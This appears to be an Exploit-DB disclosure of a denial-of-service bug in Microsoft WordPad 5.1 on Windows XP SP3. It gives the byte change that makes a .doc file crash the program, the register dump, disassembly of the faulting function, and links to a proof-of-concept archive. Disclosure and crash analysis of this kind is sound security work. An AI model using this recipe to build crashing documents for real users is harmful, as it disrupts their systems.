Microsoft Wordpad 5.1 - .doc Null Pointer Dereference Vulnerability

2012-05-30T00:00:00
ID EDB-ID:18952
Type exploitdb
Reporter condis
Modified 2012-05-30T00:00:00

Description

Microsoft Wordpad 5.1 - (.doc) Null Pointer Dereference Vulnerability. Dos exploit for windows platform

                                        
                                            Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability
Found by condis

Tested on Windows XP SP 3 Proffesional PL
MS Wordpad 5.1 (Compilation 2600.xpsp.080413-2111 SP 3)

This isn't bug from CWE 2009-0259

$ Binnary diff of template file (proper empty doc document) and malformed file 
(showing just the offset that differs):

0000 1200: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 -- template file
0000 1200: 00 00 00 00 00 00 63 6F  6E 64 00 00 00 00 00 00 -- proof of concept

Actually it doesn't matters (almost) what 4 bytes we will put there untill they != 0x00. 

Access violation when reading [00000004]

$ Registers:

eax = 020ebb72 ebx = 00000000 ecx = 020ebb7c edx = 00090608 
esi = 00000000 edi = 01bc04a8 eip = 01b9dbbb esp = 0177f5c8 
ebp = 0177f5cc 

$ Function dump :

01b9dbb4 55              push    ebp
01b9dbb5 8bec            mov     ebp,esp
01b9dbb7 56              push    esi
01b9dbb8 8b7508          mov     esi,dword ptr [ebp+8]
01b9dbbb 807e0400        cmp     byte ptr [esi+4],0         ds:0023:00000004=?? ; ---- crash
01b9dbbf 751b            jne     mswrd8+0x1dbdc (01b9dbdc)
01b9dbc1 8b06            mov     eax,dword ptr [esi]
01b9dbc3 57              push    edi
01b9dbc4 8b78fc          mov     edi,dword ptr [eax-4]
01b9dbc7 57              push    edi
01b9dbc8 ff156010b801    call    dword ptr [mswrd8+0x1060 (01b81060)]
01b9dbce 57              push    edi
01b9dbcf ff157410b801    call    dword ptr [mswrd8+0x1074 (01b81074)]
01b9dbd5 56              push    esi
01b9dbd6 e87bfdffff      call    mswrd8+0x1d956 (01b9d956)
01b9dbdb 5f              pop     edi
01b9dbdc 5e              pop     esi
01b9dbdd 5d              pop     ebp

$ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3

$ Below You should see link to attachement with PoC:

http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18952.rar